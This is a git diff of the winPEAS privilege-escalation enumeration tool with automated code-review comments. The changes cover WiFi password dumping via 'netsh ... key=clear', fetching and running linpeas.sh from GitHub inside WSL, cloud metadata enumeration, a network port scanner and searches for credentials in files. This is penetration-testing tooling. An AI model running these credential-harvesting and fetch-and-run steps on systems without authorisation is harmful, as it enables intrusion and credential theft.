diff --git a/LICENSE b/LICENSE
index 78a5d1c..afa1236 100755
--- a/LICENSE
+++ b/LICENSE
@@ -1,7 +1,7 @@
COPYING -- Describes the terms under which peass-ng is distributed. A copy
of the GNU General Public License (GPL) is appended to this file.
-peass-ng is (C) 2006-2022 Carlos Polop Martin.
+peass-ng is (C) 2019-2024 Carlos Polop Martin.
This program is free software; you may redistribute and/or modify it under
the terms of the GNU General Public License as published by the Free
diff --git a/README.md b/README.md
index c72e70b..47ac44c 100755
--- a/README.md
+++ b/README.md
@@ -38,6 +38,3 @@ If you want to **add something** and have **any cool idea** related to this proj
All the scripts/binaries of the PEAS suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own machines and/or with the owner's permission.
-
-
-By Polop(TM)
diff --git a/linPEAS/README.md b/linPEAS/README.md
index 298bfc3..7f202a0 100755
--- a/linPEAS/README.md
+++ b/linPEAS/README.md
@@ -233,5 +233,3 @@ If you find any issue, please report it using **[github issues](https://github.c
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
-
-By Polop(TM)
diff --git a/winPEAS/README.md b/winPEAS/README.md
index b0724fc..0407e78 100755
--- a/winPEAS/README.md
+++ b/winPEAS/README.md
@@ -23,5 +23,3 @@ Are you a PEASS fan? Get now our merch at **[PEASS Shop](https://teespring.com/s
## Advisory
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
-
-By Polop
diff --git a/winPEAS/winPEASbat/README.md b/winPEAS/winPEASbat/README.md
index 112fc0d..444a33c 100755
--- a/winPEAS/winPEASbat/README.md
+++ b/winPEAS/winPEASbat/README.md
@@ -132,6 +132,3 @@ This is the kind of outpuf that you have to look for when usnig the winPEAS.bat
## Advisory
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
-
-
-By Polop(TM)
diff --git a/winPEAS/winPEASbat/winPEAS.bat b/winPEAS/winPEASbat/winPEAS.bat
index 0d43701..5478eea 100755
--- a/winPEAS/winPEASbat/winPEAS.bat
+++ b/winPEAS/winPEASbat/winPEAS.bat
@@ -4,7 +4,7 @@ COLOR 0F
CALL :SetOnce
REM :: WinPEAS - Windows local Privilege Escalation Awesome Script
-REM :: Code by PEASS-ng; Re-Write by ThisLimn0
+REM :: Code by carlospolop; Re-Write by ThisLimn0
REM Registry scan of other drives besides
REM /////true or false
@@ -46,7 +46,7 @@ CALL :ColorLine " %E%32m(((((((((. ,%E%92m(############################(%E%32m
CALL :ColorLine " %E%32m(((((((((/, %E%92m,####################(%E%32m/..((((((((((.%E%97m"
CALL :ColorLine " %E%32m(((((((((/,. %E%92m,*//////*,.%E%32m ./(((((((((((.%E%97m"
CALL :ColorLine " %E%32m(((((((((((((((((((((((((((/%E%97m"
-ECHO. by github.com/PEASS-ng
+ECHO. by carlospolop
ECHO.
ECHO.
@@ -363,7 +363,7 @@ CALL :T_Progress 1
:WifiCreds
CALL :ColorLine " %E%33m[+]%E%97m WIFI"
-for /f "tokens=3,* delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (netsh wlan show profiles name=%%b key=clear | findstr "SSID Cipher Content" | find /v "Number" & ECHO.)
+for /f "tokens=4 delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (netsh wlan show profiles name=%%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & ECHO.)
CALL :T_Progress 1
:BasicUserInfo
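Review bot: `tokens=4` keeps only the fourth colon/space-delimited token of each `netsh wlan show profiles` line, so a profile name containing spaces is cut at its first word and the inner `netsh wlan show profiles name=%%a` then queries a name that does not exist; the removed `tokens=3,*` form with `%%b` captured the remainder of the line and kept multi-word names intact. If the change was meant only to drop the label text, `tokens=3,* delims=: ` with `%%b` still does that. A name containing a colon is truncated by either form, which is worth a `REM` above the loop.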
diff --git a/winPEAS/winPEASexe/README.md b/winPEAS/winPEASexe/README.md
index e80f09e..5f54578 100755
--- a/winPEAS/winPEASexe/README.md
+++ b/winPEAS/winPEASexe/README.md
@@ -178,6 +178,11 @@ Once you have installed and activated it you need to:
- [x] DNS Cache (limit 70)
- [x] Internet Settings
+- **Cloud Metadata Enumeration**
+ - [x] AWS Metadata
+ - [x] GCP Metadata
+ - [x] Azure Metadata
+
- **Windows Credentials**
- [x] Windows Vault
- [x] Credential Manager
@@ -256,6 +261,3 @@ If you find any issue, please report it using **[github issues](https://github.c
## Advisory
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
-
-
-By Polop
diff --git a/winPEAS/winPEASexe/Tests/SmokeTests.cs b/winPEAS/winPEASexe/Tests/SmokeTests.cs
index 49525a3..9542bf8 100644
--- a/winPEAS/winPEASexe/Tests/SmokeTests.cs
+++ b/winPEAS/winPEASexe/Tests/SmokeTests.cs
@@ -12,7 +12,7 @@ namespace winPEAS.Tests
try
{
string[] args = new string[] {
- "systeminfo", "userinfo", "servicesinfo", "browserinfo", "eventsinfo", "debug"
+ "systeminfo", "userinfo", "servicesinfo", "browserinfo", "eventsinfo", "cloud", "debug"
};
Program.Main(args);
}
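Review bot: The added argument `"cloud"` does not match the key under which the new check is registered in Checks.cs, which is `"cloudinfo"` (the help text in Beaprint.cs lists `cloudinfo` as well), so unless unknown arguments are mapped somewhere not shown here this smoke test never runs CloudInfo. Use `"cloudinfo"` so the new check is actually exercised. The enclosing test method starts and ends outside the hunk.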
diff --git a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Watson.cs b/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Watson.cs
index fbf64cc..307cf94 100644
--- a/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Watson.cs
+++ b/winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Watson.cs
@@ -20,7 +20,7 @@ namespace winPEAS._3rdParty.Watson
{
{ 10240, "1507" }, { 10586, "1511" }, { 14393, "1607" }, { 15063, "1703" }, { 16299, "1709" },
{ 17134, "1803" }, { 17763, "1809" }, { 18362, "1903" }, { 18363, "1909" }, { 19041, "2004" },
- { 19042, "20H2" }
+ { 19042, "20H2" }, { 22000, "21H2" }, { 22621, "22H2" }
};
// Get OS Build number
@@ -30,7 +30,6 @@ namespace winPEAS._3rdParty.Watson
if (!supportedVersions.ContainsKey(buildNumber))
{
Console.Error.WriteLine($" [!] Windows version not supported, build number: '{buildNumber}'");
- return;
}
var version = supportedVersions[buildNumber];
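Review bot: With the `return;` removed, an unsupported build number still reaches `supportedVersions[buildNumber]` on the next line, which throws KeyNotFoundException, so the change turns a clean "not supported" message into an unhandled exception for every build absent from the table. If the intent is to continue with the KB listing, replace the ContainsKey/indexer pair with `if (!supportedVersions.TryGetValue(buildNumber, out var version)) { Console.Error.WriteLine($" [!] Windows version not supported, build number: '{buildNumber}'"); }` and let the later code tolerate a null version. The same `return;` removal in the next hunk ("Could not retrieve Windows BuildNumber") has the same effect if anything after it uses the version; that method starts and ends outside both hunks.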
@@ -39,7 +38,6 @@ namespace winPEAS._3rdParty.Watson
else
{
Console.Error.WriteLine(" [!] Could not retrieve Windows BuildNumber");
- return;
}
// List of KBs installed
diff --git a/winPEAS/winPEASexe/winPEAS/Checks/ApplicationsInfo.cs b/winPEAS/winPEASexe/winPEAS/Checks/ApplicationsInfo.cs
index 7e75254..fed1fe3 100644
--- a/winPEAS/winPEASexe/winPEAS/Checks/ApplicationsInfo.cs
+++ b/winPEAS/winPEASexe/winPEAS/Checks/ApplicationsInfo.cs
@@ -117,6 +117,7 @@ namespace winPEAS.Checks
{ (app["Folder"].Length > 0) ? app["Folder"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "ouigyevb2uivydi2u3id2ddf3", !string.IsNullOrEmpty(app["interestingFolderRights"]) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good },
{ (app["File"].Length > 0) ? app["File"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "adu8v298hfubibuidiy2422r", !string.IsNullOrEmpty(app["interestingFileRights"]) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good },
{ (app["Reg"].Length > 0) ? app["Reg"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "o8a7eduia37ibduaunbf7a4g7ukdhk4ua", (app["RegPermissions"].Length > 0) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good },
+ { "Potentially sensitive file content:", Beaprint.ansi_color_bad },
};
string line = "";
@@ -158,9 +159,9 @@ namespace winPEAS.Checks
line += "\n File: " + filepath_mod;
}
- if (app["isUnquotedSpaced"].ToLower() == "true")
+ if (app["isUnquotedSpaced"].ToLower() != "false")
{
- line += " (Unquoted and Space detected)";
+ line += $" (Unquoted and Space detected) - {app["isUnquotedSpaced"]}";
}
if (!string.IsNullOrEmpty(app["interestingFileRights"]))
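Review bot: `isUnquotedSpaced` now carries either the literal `"false"` or a comma-joined list of paths, and the `!= "false"` test plus the appended `- {app["isUnquotedSpaced"]}` assumes every producer has been migrated; any producer still writing `bool.ToString()` (the form this commit replaces in AutoRuns.cs) would print `- True` where a path list is expected. A separate key such as `injectablePaths` next to a boolean flag would keep the two meanings apart; at minimum a comment on the condition, e.g. `// "false" or a comma-separated list of writable path prefixes`, documents the accepted formats. The enclosing method starts and ends outside the hunk.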
@@ -168,6 +169,11 @@ namespace winPEAS.Checks
line += "\n FilePerms: " + app["interestingFileRights"];
}
+ if (app.ContainsKey("sensitiveInfoList") && !string.IsNullOrEmpty(app["sensitiveInfoList"]))
+ {
+ line += "\n Potentially sensitive file content: " + app["sensitiveInfoList"];
+ }
+
Beaprint.AnsiPrint(line, colorsA);
Beaprint.PrintLineSeparator();
}
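Review bot: The added `app.ContainsKey("sensitiveInfoList") && !string.IsNullOrEmpty(app["sensitiveInfoList"])` looks the key up twice; `app.TryGetValue("sensitiveInfoList", out var sensitiveInfo) && !string.IsNullOrEmpty(sensitiveInfo)` does it once and reads more clearly, assuming `app` is a string-keyed dictionary of strings (its generic arguments are not visible on the page). The enclosing method starts outside the hunk.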
diff --git a/winPEAS/winPEASexe/winPEAS/Checks/Checks.cs b/winPEAS/winPEASexe/winPEAS/Checks/Checks.cs
index 17e7e7e..45e67d4 100644
--- a/winPEAS/winPEASexe/winPEAS/Checks/Checks.cs
+++ b/winPEAS/winPEASexe/winPEAS/Checks/Checks.cs
@@ -3,12 +3,14 @@ using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Management;
+using System.Net;
using System.Security.Principal;
using winPEAS.Helpers;
using winPEAS.Helpers.AppLocker;
using winPEAS.Helpers.Registry;
using winPEAS.Helpers.Search;
using winPEAS.Helpers.YamlConfig;
+using winPEAS.Info.NetworkInfo.NetworkScanner;
using winPEAS.Info.UserInfo;
namespace winPEAS.Checks
@@ -21,8 +23,12 @@ namespace winPEAS.Checks
public static bool IsDebug = false;
public static bool IsLinpeas = false;
public static bool IsLolbas = false;
+ public static bool IsNetworkScan = false;
public static bool SearchProgramFiles = false;
+ private static IEnumerable PortScannerPorts = null;
+ private static string NetworkScanOptions = string.Empty;
+
// Create Dynamic blacklists
public static readonly string CurrentUserName = Environment.UserName;
public static string CurrentUserDomainName = Environment.UserDomainName;
@@ -47,7 +53,7 @@ namespace winPEAS.Checks
private static readonly HashSet _systemCheckSelectedKeysHashSet = new HashSet();
// github url for Linpeas.sh
- public static string LinpeasUrl = "https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh";
+ public static string LinpeasUrl = "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh";
public const string DefaultLogFile = "out.txt";
@@ -87,7 +93,8 @@ namespace winPEAS.Checks
new SystemCheck("windowscreds", new WindowsCreds()),
new SystemCheck("browserinfo", new BrowserInfo()),
new SystemCheck("filesinfo", new FilesInfo()),
- new SystemCheck("fileanalysis", new FileAnalysis())
+ new SystemCheck("fileanalysis", new FileAnalysis()),
+ new SystemCheck("cloudinfo", new CloudInfo())
};
var systemCheckAllKeys = new HashSet(_systemChecks.Select(i => i.Key));
@@ -199,6 +206,52 @@ namespace winPEAS.Checks
}
}
+ if (arg.StartsWith("-network", StringComparison.CurrentCultureIgnoreCase))
+ {
+ /*
+ -network="auto" - find interfaces/hosts automatically
+ -network="10.10.10.10,10.10.10.20" - scan only selected ip address(es)
+ -network="10.10.10.10/24" - scan host based on ip address/netmask
+ */
+ if (!IsNetworkTypeValid(arg))
+ {
+ Beaprint.ColorPrint($" [!] the \"-network\" argument is invalid. For help, run winpeass.exe --help", Beaprint.YELLOW);
+
+ return;
+ }
+
+ var parts = arg.Split('=');
+ string networkType = parts[1];
+
+ IsNetworkScan = true;
+ NetworkScanOptions = networkType;
+ }
+
+ if (arg.StartsWith("-ports", StringComparison.CurrentCultureIgnoreCase))
+ {
+ // e.g. -ports="80,443,8080"
+ var parts = arg.Split('=');
+ if (!IsNetworkScan || parts.Length != 2 || string.IsNullOrEmpty(parts[1]))
+ {
+ Beaprint.ColorPrint($" [!] the \"-network\" argument is not present or valid, add it if you want to define network scan ports. For help, run winpeass.exe --help", Beaprint.YELLOW);
+
+ return;
+ }
+
+ var portString = parts[1];
+ IEnumerable ports = new List();
+ try
+ {
+ PortScannerPorts = portString.Trim('"').Trim('\'').Split(',').ToList().ConvertAll(int.Parse);
+ }
+ catch (Exception)
+ {
+ Beaprint.ColorPrint($" [!] the \"-ports\" argument is not present or valid, add it if you want to define network scan ports. For help, run winpeass.exe --help", Beaprint.YELLOW);
+
+ return;
+ }
+ }
+
string argToLower = arg.ToLower();
if (systemCheckAllKeys.Contains(argToLower))
{
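Review bot: `-ports` is accepted only when `IsNetworkScan` is already true, so it depends on `-network` appearing earlier on the command line; with the two options in the other order the "not present or valid" message is printed and the method returns even though both were given. Parsing `-ports` into `PortScannerPorts` unconditionally and validating the pairing once after the argument loop removes the ordering dependency. The local `IEnumerable ports = new List();` is never used, the parsed values are not range-checked (`int.Parse` happily returns 0 or 70000), and `catch (Exception)` can be narrowed to `FormatException`/`OverflowException`, which are what `int.Parse` throws for bad text. The enclosing argument loop starts and ends outside the hunk.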
@@ -237,7 +290,7 @@ namespace winPEAS.Checks
CheckRunner.Run(() => CreateDynamicLists(isFileSearchEnabled), IsDebug);
- RunChecks(isAllChecks, wait);
+ RunChecks(isAllChecks, wait, IsNetworkScan);
SearchHelper.CleanLists();
@@ -258,7 +311,58 @@ namespace winPEAS.Checks
}
}
- private static void RunChecks(bool isAllChecks, bool wait)
+ private static bool IsNetworkTypeValid(string arg)
+ {
+ var parts = arg.Split('=');
+ string networkType = string.Empty;
+
+ if (parts.Length == 2 && !string.IsNullOrEmpty(parts[1]))
+ {
+ networkType = parts[1];
+
+ // auto
+ if (string.Equals(networkType, "auto", StringComparison.InvariantCultureIgnoreCase))
+ {
+ return true;
+ }
+
+ // netmask e.g. 10.10.10.10/24
+ else if (networkType.Contains("/"))
+ {
+ var rangeParts = networkType.Split('/');
+
+ if (rangeParts.Length == 2 && int.TryParse(rangeParts[1], out int res) && res <= 32 && res >= 0)
+ {
+ return true;
+ }
+ }
+ // list of ip addresses
+ else if (networkType.Contains(","))
+ {
+ var ips = networkType.Split(',');
+
+ try
+ {
+ var validIpsCount = ips.ToList().ConvertAll(IPAddress.Parse).Count();
+ }
+ catch (Exception)
+ {
+ return false;
+ }
+
+ return true;
+ }
+ // single ip
+ else if (IPAddress.TryParse(networkType, out _))
+ {
+ return true;
+ }
+ }
+
+ return false;
+ }
+
+ private static void RunChecks(bool isAllChecks, bool wait, bool isNetworkScan)
{
for (int i = 0; i < _systemChecks.Count; i++)
{
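Review bot: The CIDR branch of IsNetworkTypeValid checks only the prefix length and never parses the address before `/`, so `foo/24` is accepted and the failure surfaces later in NetworkScanner; adding `IPAddress.TryParse(rangeParts[0], out _)` to that condition closes the gap. In the list branch `validIpsCount` is unused and the try/catch around `ConvertAll(IPAddress.Parse)` can become `return ips.All(ip => IPAddress.TryParse(ip.Trim(), out _));`. Note that IPAddress.Parse/TryParse also accept abbreviated forms such as `10.1`, so the check is lenient by design of the API; a comment saying so would save a reader from tightening it by accident. RunChecks at the end of the hunk continues outside it.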
@@ -274,6 +378,12 @@ namespace winPEAS.Checks
}
}
}
+
+ if (isNetworkScan)
+ {
+ NetworkScanner scanner = new NetworkScanner(NetworkScanOptions, PortScannerPorts);
+ scanner.Scan();
+ }
}
private static void CreateDynamicLists(bool isFileSearchEnabled)
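Review bot: `scanner.Scan()` runs after the check loop with no exception handling, unlike the other work in this file that goes through `CheckRunner.Run` (see the CreateDynamicLists call in the earlier hunk); an exception from the scanner propagates out of RunChecks and skips the `SearchHelper.CleanLists()` call that follows it in the caller. Wrapping it as `CheckRunner.Run(() => new NetworkScanner(NetworkScanOptions, PortScannerPorts).Scan(), IsDebug);` keeps it consistent, assuming CheckRunner.Run catches and reports as its other uses suggest. A one-line comment that `PortScannerPorts` is null when `-ports` was not given would also help, if NetworkScanner is expected to handle that.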
diff --git a/winPEAS/winPEASexe/winPEAS/Checks/CloudInfo.cs b/winPEAS/winPEASexe/winPEAS/Checks/CloudInfo.cs
new file mode 100644
index 0000000..bf1dc37
--- /dev/null
+++ b/winPEAS/winPEASexe/winPEAS/Checks/CloudInfo.cs
@@ -0,0 +1,93 @@
+using System.Collections.Generic;
+using winPEAS.Helpers;
+using winPEAS.Info.CloudInfo;
+
+namespace winPEAS.Checks
+{
+ internal class CloudInfo : ISystemCheck
+ {
+ public void PrintInfo(bool isDebug)
+ {
+ Beaprint.GreatPrint("Cloud Information");
+
+ var cloudInfoList = new List
+ {
+ new AWSInfo(),
+ new AzureInfo(),
+ new GCPInfo()
+ };
+
+ foreach (var cloudInfo in cloudInfoList)
+ {
+ string isCloud = cloudInfo.IsCloud ? "Yes" : "No";
+ string line = string.Format($"{cloudInfo.Name + "?",-40}{isCloud,-5}");
+
+ Dictionary colorsMS = new Dictionary()
+ {
+ { "Yes", Beaprint.ansi_color_bad },
+ };
+ Beaprint.AnsiPrint(line, colorsMS);
+ }
+
+ foreach (var cloudInfo in cloudInfoList)
+ {
+ if (cloudInfo.IsCloud)
+ {
+ Beaprint.MainPrint(cloudInfo.Name + " Enumeration");
+
+ if (cloudInfo.IsAvailable)
+ {
+ foreach (var kvp in cloudInfo.EndpointDataList())
+ {
+ // key = "section", e.g. User, Network, ...
+ string section = kvp.Key;
+ var endpointDataList = kvp.Value;
+
+ Beaprint.ColorPrint(section, Beaprint.ansi_color_good);
+
+ foreach (var endpointData in endpointDataList)
+ {
+ var colors = new Dictionary
+ {
+ { endpointData.EndpointName, Beaprint.GRAY }
+ };
+
+ string message;
+ if (!string.IsNullOrEmpty(endpointData.Data))
+ {
+ message = endpointData.Data;
+ // if it is a JSON data, add additional newline so it's displayed on a separate line
+ if (message.StartsWith("{"))
+ {
+ message = $"\n{message}\n";
+ }
+
+ if (endpointData.IsAttackVector)
+ {
+ colors.Add(message, Beaprint.ansi_color_bad);
+ }
+ else
+ {
+ colors.Add(message, Beaprint.ansi_color_gray);
+ }
+ }
+ else
+ {
+ message = "No data received from the metadata endpoint";
+ }
+
+ Beaprint.ColorPrint($"{endpointData.EndpointName,-30}{message}", Beaprint.ansi_color_gray);
+ }
+
+ Beaprint.GrayPrint("");
+ }
+ }
+ else
+ {
+ Beaprint.NoColorPrint("Could not connect to the metadata endpoint");
+ }
+ }
+ }
+ }
+ }
+}
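Review bot: The `colors` dictionary built per endpoint, and extended with the bad or gray colour depending on `IsAttackVector`, is never passed to a print call: the line is emitted with `Beaprint.ColorPrint(..., Beaprint.ansi_color_gray)`, so attack-vector data is printed in the same gray as everything else and the whole branch is dead code. Presumably the intended call is `Beaprint.AnsiPrint($"{endpointData.EndpointName,-30}{message}", colors);`, mirroring the `colorsMS` usage a few lines above. Separately, `string.Format($"...")` wraps an already-interpolated string and throws FormatException if a cloud name ever contains braces, so the interpolation alone is enough, and `message.StartsWith("{")` is culture-sensitive where `StartsWith("{", StringComparison.Ordinal)` states the intent.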
diff --git a/winPEAS/winPEASexe/winPEAS/Checks/FileAnalysis.cs b/winPEAS/winPEASexe/winPEAS/Checks/FileAnalysis.cs
index 3da86fd..b440757 100644
--- a/winPEAS/winPEASexe/winPEAS/Checks/FileAnalysis.cs
+++ b/winPEAS/winPEASexe/winPEAS/Checks/FileAnalysis.cs
@@ -1,4 +1,4 @@
-using System;
+using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
@@ -97,9 +97,19 @@ namespace winPEAS.Checks
else
{
foreach (var fold in file.FullPath.Split('\\').Skip(1))
- {
- isFileFound = Regex.IsMatch(fold, pattern, RegexOptions.IgnoreCase);
- if (isFileFound) break;
+ {
+ try
+ {
+ isFileFound = Regex.IsMatch(fold, pattern, RegexOptions.IgnoreCase, TimeSpan.FromSeconds(20));
+ if (isFileFound) break;
+ }
+ catch (RegexMatchTimeoutException e)
+ {
+ if (Checks.IsDebug)
+ {
+ Beaprint.GrayPrint($"The file in folder regex {pattern} had a timeout in {fold} (ReDoS avoided but regex unchecked in a file)");
+ }
+ }
}
}
}
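Review bot: The exception variable `e` in the new `catch (RegexMatchTimeoutException e)` block is never read, here and in the second hunk of this file; `catch (RegexMatchTimeoutException)` avoids the unused-variable warning. The 20-second budget is per folder segment and per pattern, so a deep path can spend far longer than 20 s in this loop; if that is accepted, a comment such as `// timeout applies per path segment` would make it explicit. The enclosing method starts and ends outside the hunk.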
@@ -111,7 +121,17 @@ namespace winPEAS.Checks
}
else
{
- isFileFound = Regex.IsMatch(file.Filename, pattern, RegexOptions.IgnoreCase);
+ try
+ {
+ isFileFound = Regex.IsMatch(file.Filename, pattern, RegexOptions.IgnoreCase, TimeSpan.FromSeconds(20));
+ }
+ catch (RegexMatchTimeoutException e)
+ {
+ if (Checks.IsDebug)
+ {
+ Beaprint.GrayPrint($"The file regex {pattern} had a timeout in {file.Filename} (ReDoS avoided but regex unchecked in a file)");
+ }
+ }
}
}
@@ -148,7 +168,7 @@ namespace winPEAS.Checks
return new bool[] { false, somethingFound };
}
- private static List SearchContent(string text, string regex_str, bool caseinsensitive)
+ public static List SearchContent(string text, string regex_str, bool caseinsensitive)
{
List foundMatches = new List();
@@ -157,17 +177,20 @@ namespace winPEAS.Checks
Regex rgx;
bool is_re_match = false;
try
- {
+ {
+ // Escape backslashes in the regex string
+ string escapedRegex = regex_str.Trim().Replace(@"\", @"\\");
+
// Use "IsMatch" because it supports timeout, if exception is thrown exit the func to avoid ReDoS in "rgx.Matches"
if (caseinsensitive)
{
- is_re_match = Regex.IsMatch(text, regex_str.Trim(), RegexOptions.IgnoreCase, TimeSpan.FromSeconds(120));
- rgx = new Regex(regex_str.Trim(), RegexOptions.IgnoreCase);
+ is_re_match = Regex.IsMatch(text, escapedRegex, RegexOptions.IgnoreCase, TimeSpan.FromSeconds(120));
+ rgx = new Regex(escapedRegex, RegexOptions.IgnoreCase);
}
else
{
- is_re_match = Regex.IsMatch(text, regex_str.Trim(), RegexOptions.None, TimeSpan.FromSeconds(120));
- rgx = new Regex(regex_str.Trim());
+ is_re_match = Regex.IsMatch(text, escapedRegex, RegexOptions.None, TimeSpan.FromSeconds(120));
+ rgx = new Regex(escapedRegex);
}
}
catch (RegexMatchTimeoutException e)
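Review bot: `regex_str.Trim().Replace(@"\", @"\\")` doubles every backslash before the pattern is compiled, which turns regex escapes such as `\d`, `\s`, `\.` or `\b` into a literal backslash followed by a letter, so any caller whose pattern uses them silently stops matching; that now includes the `pwd_inside_history` value AutoRuns.cs passes through this method, if it contains escapes. If the goal is to tolerate one specific unescaped input, escape that input at its call site (or `Regex.Escape` it) rather than rewriting every pattern here. The enclosing method starts outside the hunk.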
@@ -200,8 +223,6 @@ namespace winPEAS.Checks
Beaprint.GrayPrint($"Error looking for regex {regex_str} inside files: {e}");
}
- //}
-
return foundMatches;
}
@@ -444,7 +465,7 @@ namespace winPEAS.Checks
foundRegexes[regex_obj.name][regex.name] = fileResults;
}
}
- catch (Exception ex)
+ catch (System.IO.IOException)
{
// Cannot read the file
}
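Review bot: Narrowing `catch (Exception ex)` to `catch (System.IO.IOException)` lets UnauthorizedAccessException escape, and that is the exception a file-system walk meets most often for access-denied files (it does not derive from IOException). If the intent is still "cannot read the file", catch both: `catch (Exception ex) when (ex is IOException || ex is UnauthorizedAccessException)`. The enclosing loop starts and ends outside the hunk.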
@@ -454,8 +475,8 @@ namespace winPEAS.Checks
timer.Stop();
TimeSpan timeTaken = timer.Elapsed;
- if (timeTaken.TotalMilliseconds > 20000)
- Beaprint.PrintDebugLine($"\nThe regex {regex.regex} took {timeTaken.TotalMilliseconds}s in {f.FullPath}");
+ if (timeTaken.TotalMilliseconds > 10000)
+ Beaprint.PrintDebugLine($"\nThe regex {regex.regex} took {timeTaken.TotalMilliseconds}ms in {f.FullPath}");
}
}
}
diff --git a/winPEAS/winPEASexe/winPEAS/Checks/FilesInfo.cs b/winPEAS/winPEASexe/winPEAS/Checks/FilesInfo.cs
index 2513936..b6974f9 100644
--- a/winPEAS/winPEASexe/winPEAS/Checks/FilesInfo.cs
+++ b/winPEAS/winPEASexe/winPEAS/Checks/FilesInfo.cs
@@ -290,15 +290,13 @@ namespace winPEAS.Checks
const string distribution = "Distribution";
const string rootDirectory = "Root directory";
const string runWith = "Run command";
+ const string wslUser = "WSL user";
+ const string root = "root";
+
var colors = new Dictionary();
- new List
- {
- linpeas,
- distribution,
- rootDirectory,
- runWith
- }.ForEach(str => colors.Add(str, Beaprint.ansi_color_bad));
+ new List { linpeas, distribution, rootDirectory, runWith, wslUser, root }
+ .ForEach(str => colors.Add(str, Beaprint.ansi_color_bad));
Beaprint.BadPrint(" Found installed WSL distribution(s) - listed below");
Beaprint.AnsiPrint($" Run {linpeas} in your WSL distribution(s) home folder(s).\n", colors);
@@ -310,14 +308,16 @@ namespace winPEAS.Checks
string distributionSubKey = $"{basePath}\\{wslKey}";
string distributionRootDirectory = $"{RegistryHelper.GetRegValue(hive, distributionSubKey, "BasePath")}\\rootfs";
string distributionName = RegistryHelper.GetRegValue(hive, distributionSubKey, "DistributionName");
+ string user = WSLHelper.TryGetRootUser(distributionName, wslKey);
Beaprint.AnsiPrint($" {distribution}: \"{distributionName}\"\n" +
+ $" {wslUser}: \"{user}\"\n" +
$" {rootDirectory}: \"{distributionRootDirectory}\"\n" +
$" {runWith}: wsl.exe --distribution \"{distributionName}\"",
colors);
Beaprint.PrintLineSeparator();
}
- catch (Exception) { }
+ catch (Exception ex) { }
}
// try to run linpeas.sh in the default distribution
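Review bot: `catch (Exception ex) { }` introduces a variable that is never used while still swallowing every error of the per-distribution block; either keep `catch (Exception)` or, matching the `catch (Exception ex)` a few lines below, report it when debugging, e.g. `if (Checks.IsDebug) Beaprint.PrintDebugLine(ex.Message);`. The enclosing loop starts outside the hunk.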
@@ -328,7 +328,7 @@ namespace winPEAS.Checks
{
try
{
- WSL.RunLinpeas(Checks.LinpeasUrl);
+ WSLHelper.RunLinpeas(Checks.LinpeasUrl);
}
catch (Exception ex)
{
diff --git a/winPEAS/winPEASexe/winPEAS/Checks/ProcessInfo.cs b/winPEAS/winPEASexe/winPEAS/Checks/ProcessInfo.cs
index d1a6b14..a6d4ced 100644
--- a/winPEAS/winPEASexe/winPEAS/Checks/ProcessInfo.cs
+++ b/winPEAS/winPEASexe/winPEAS/Checks/ProcessInfo.cs
@@ -36,11 +36,14 @@ namespace winPEAS.Checks
{ "Possible DLL Hijacking.*", Beaprint.ansi_color_bad },
};
- if (DefensiveProcesses.Definitions.ContainsKey(procInfo["Name"]))
+ // we need to find first occurrence of the procinfo name
+ string processNameSanitized = procInfo["Name"].Trim().ToLower();
+
+ if (DefensiveProcesses.AVVendorsByProcess.ContainsKey(processNameSanitized))
{
- if (!string.IsNullOrEmpty(DefensiveProcesses.Definitions[procInfo["Name"]]))
+ if (DefensiveProcesses.AVVendorsByProcess[processNameSanitized].Count > 0)
{
- procInfo["Product"] = DefensiveProcesses.Definitions[procInfo["Name"]];
+ procInfo["Product"] = string.Join(", ", DefensiveProcesses.AVVendorsByProcess[processNameSanitized]);
}
colorsP[procInfo["Product"]] = Beaprint.ansi_color_good;
}
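Review bot: The new lookup key is built with `ToLower()`, which is culture-sensitive (under a Turkish locale `I` does not map to `i`), and the dictionary is then consulted three times with ContainsKey plus two indexers. `string processNameSanitized = procInfo["Name"].Trim().ToLowerInvariant();` followed by `if (DefensiveProcesses.AVVendorsByProcess.TryGetValue(processNameSanitized, out var vendors))` gives one lookup and a stable key, assuming the dictionary's own keys are stored lower-case. The enclosing method starts and ends outside the hunk.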
diff --git a/winPEAS/winPEASexe/winPEAS/Checks/SystemInfo.cs b/winPEAS/winPEASexe/winPEAS/Checks/SystemInfo.cs
index ab046f5..d8950b0 100644
--- a/winPEAS/winPEASexe/winPEAS/Checks/SystemInfo.cs
+++ b/winPEAS/winPEASexe/winPEAS/Checks/SystemInfo.cs
@@ -387,8 +387,7 @@ namespace winPEAS.Checks
static void PrintCachedCreds()
{
- try
- {
+ try{
Beaprint.MainPrint("Cached Creds");
